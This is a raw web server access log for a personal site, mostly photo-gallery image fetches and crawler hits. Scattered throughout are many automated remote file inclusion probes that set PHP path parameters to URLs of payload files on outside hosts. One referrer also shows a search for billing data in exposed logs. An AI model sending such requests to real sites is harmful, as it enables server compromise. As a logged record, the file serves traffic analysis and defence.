62.28.57.254 - - [02/Apr/2009:09:24:40 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-041_1.jpg HTTP/1.0" 200 405226 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
216.104.37.122 - - [02/Apr/2009:09:24:41 -0700] "GET /logs/access_090223.log/?sourcedir=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:24:43 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0157.jpg HTTP/1.0" 200 311163 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:24:45 -0700] "GET /vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:24:48 -0700] "GET /logs/access_080707.log/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.candidography.com/zero/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:24:48 -0700] "GET /logs/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.16.91.22 - - [02/Apr/2009:09:24:54 -0700] "GET /logs/access_080811.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://metalblack.altervista.org/fxid9.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:24:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-137_1.jpg HTTP/1.0" 200 465007 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
209.62.125.194 - - [02/Apr/2009:09:24:56 -0700] "GET /logs/access_080706.log%20%20//contrib/yabbse/poc.php?poc_root_path=http://axioma-dch.com/servicios/FX29ID1????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:24:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0170.jpg HTTP/1.0" 200 360510 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:25:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-054.jpg HTTP/1.0" 200 458289 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:25:13 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0161.jpg HTTP/1.0" 200 448957 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:25:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-107.jpg HTTP/1.0" 200 424628 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:25:31 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0175.jpg HTTP/1.0" 200 327600 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
213.193.230.2 - - [02/Apr/2009:09:25:38 -0700] "GET /logs/access_080811.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vemk.artn.ru/site/images/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.6.17.169 - - [02/Apr/2009:09:25:42 -0700] "GET /logs/access_071201.log HTTP/1.0" 200 44753 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:25:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-292.jpg HTTP/1.0" 200 332939 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:25:46 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0171.jpg HTTP/1.0" 200 345976 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
218.249.60.66 - - [02/Apr/2009:09:25:52 -0700] "GET /logs/access_080412.log/?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.60.66 - - [02/Apr/2009:09:25:52 -0700] "GET /logs/?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 200 93470 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:26:01 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-068_0.jpg HTTP/1.0" 200 214900 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:26:04 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0140.jpg HTTP/1.0" 200 351155 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
218.249.60.66 - - [02/Apr/2009:09:26:09 -0700] "GET /logs/access_090223.log/?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.60.66 - - [02/Apr/2009:09:26:10 -0700] "GET /?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 200 65555 "-" "Mozilla/5.0" "www.dmulk.com"
211.245.159.231 - - [02/Apr/2009:09:26:17 -0700] "GET /logs/access_080616.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://members.mywave.at/m206111aa/cms/administrator/components/com_virtuemart/html/templates/order_emails/v4id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.245.159.231 - - [02/Apr/2009:09:26:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://members.mywave.at/m206111aa/cms/administrator/components/com_virtuemart/html/templates/order_emails/v4id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.245.159.231 - - [02/Apr/2009:09:26:18 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://members.mywave.at/m206111aa/cms/administrator/components/com_virtuemart/html/templates/order_emails/v4id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:26:21 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0141.jpg HTTP/1.0" 200 378474 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:26:37 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0148.jpg HTTP/1.0" 200 398432 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:26:40 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-096_1.jpg HTTP/1.0" 200 402460 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
74.6.17.169 - - [02/Apr/2009:09:26:45 -0700] "GET /bikes/dteel/1999_08/?M=D HTTP/1.0" 200 2085 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:26:52 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0163.jpg HTTP/1.0" 200 346344 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:26:54 -0700] "GET /home.php?index=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:26:54 -0700] "GET /logs/access_090126.log/home.php?index=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:26:54 -0700] "GET /logs/home.php?index=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:26:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-038_2.jpg HTTP/1.0" 200 591316 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:26:59 -0700] "GET /logs/access_080602.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:27:00 -0700] "GET /home.php?index=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:27:00 -0700] "GET /logs/access_090126.log/home.php?index=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:27:00 -0700] "GET /logs/home.php?index=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:09:27:03 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:09:27:03 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:09:27:04 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.246.20.221 - - [02/Apr/2009:09:27:05 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.thenakedtruckerandt-bones.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:27:07 -0700] "GET /logs/access_081221.log/home.php?index=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:27:07 -0700] "GET /vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:27:09 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0167.jpg HTTP/1.0" 200 399577 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:27:10 -0700] "GET /logs/access_080707.log%20%20/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:09:27:12 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:27:13 -0700] "GET /logs/access_081221.log/home.php?index=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:27:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-232.jpg HTTP/1.0" 200 349706 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:27:27 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0145.jpg HTTP/1.0" 200 330556 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:27:30 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-093_1.jpg HTTP/1.0" 200 315330 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
211.105.96.41 - - [02/Apr/2009:09:27:36 -0700] "GET /logs/access_080308.log%20%20/?env[include_prefix]=http://exploitro.com/forums/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:27:41 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0177.jpg HTTP/1.0" 200 348079 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:27:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-143_1.jpg HTTP/1.0" 200 282706 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
83.229.87.246 - - [02/Apr/2009:09:27:53 -0700] "GET /logs/access_090111.log HTTP/1.1" 200 786432 "http://uk.search.yahoo.com/search?n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=m3&vst=0&vf=txt&vm=p&fl=0&fr=ush1-mail&p=%2B1+visa+OR+%40aol.com+OR+comcast.net+OR+yahoo.com+OR+march%2F2009+%22Billing%22+-spam+-scam+-viagra&vs=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
211.105.96.41 - - [02/Apr/2009:09:27:54 -0700] "GET /logs/access_080427.log%20%20/?env[include_prefix]=http://exploitro.com/forums/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:27:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0153.jpg HTTP/1.0" 200 343210 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:28:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-011_4.jpg HTTP/1.0" 200 345886 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
200.43.77.59 - - [02/Apr/2009:09:28:04 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.43.77.59 - - [02/Apr/2009:09:28:04 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.43.77.59 - - [02/Apr/2009:09:28:04 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:28:13 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0143.jpg HTTP/1.0" 200 332772 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:28:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-100_1.jpg HTTP/1.0" 200 341338 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
203.188.254.4 - - [02/Apr/2009:09:28:21 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.188.254.4 - - [02/Apr/2009:09:28:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.188.254.4 - - [02/Apr/2009:09:28:21 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:28:28 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0176.jpg HTTP/1.0" 200 328570 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
216.104.37.122 - - [02/Apr/2009:09:28:31 -0700] "GET /logs/access_080811.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
200.43.77.59 - - [02/Apr/2009:09:28:35 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:28:42 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:28:44 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0168.jpg HTTP/1.0" 200 386333 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:28:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-074_1.jpg HTTP/1.0" 200 387011 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:29:02 -0700] "GET /logs/access_080707.log/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:29:02 -0700] "GET /logs/access_081113.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.26.174.184 - - [02/Apr/2009:09:29:11 -0700] "GET /logs/access_081021.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.26.174.184 - - [02/Apr/2009:09:29:11 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.26.174.184 - - [02/Apr/2009:09:29:11 -0700] "GET /logs/access_080714.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.230.2 - - [02/Apr/2009:09:29:27 -0700] "GET /logs/access_080616.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vemk.artn.ru/site/images/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.26.174.184 - - [02/Apr/2009:09:29:34 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 200 65555 "-" "libwww-perl/5.805" "www.dmulk.com"
202.58.65.23 - - [02/Apr/2009:09:29:57 -0700] "GET /logs/access_080519.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.58.65.23 - - [02/Apr/2009:09:29:57 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.58.65.23 - - [02/Apr/2009:09:29:57 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.62.125.194 - - [02/Apr/2009:09:30:06 -0700] "GET /logs/access_081003.log//contrib/yabbse/poc.php?poc_root_path=http://axioma-dch.com/servicios/FX29ID1????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.54.202.218 - - [02/Apr/2009:09:30:17 -0700] "GET /logs/access_080412.log/?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.54.202.194 - - [02/Apr/2009:09:30:17 -0700] "GET /logs/?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 200 93470 "-" "Mozilla/5.0" "www.dmulk.com"
203.188.254.4 - - [02/Apr/2009:09:30:24 -0700] "GET /logs/access_080811.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.25.255.194 - - [02/Apr/2009:09:30:28 -0700] "GET /logs/access_090223.log/?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.62.125.194 - - [02/Apr/2009:09:30:30 -0700] "GET /logs/access_080706.log//contrib/yabbse/poc.php?poc_root_path=http://axioma-dch.com/servicios/FX29ID1????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
198.54.202.226 - - [02/Apr/2009:09:30:39 -0700] "GET /?sourcedir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 200 105994 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:09:31:08 -0700] "GET /logs/access_081011.log/index1.php?page=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.245.159.231 - - [02/Apr/2009:09:31:45 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://members.mywave.at/m206111aa/cms/administrator/components/com_virtuemart/html/templates/order_emails/v4id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.8.248.158 - - [02/Apr/2009:09:32:09 -0700] "GET /logs/access_080426.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
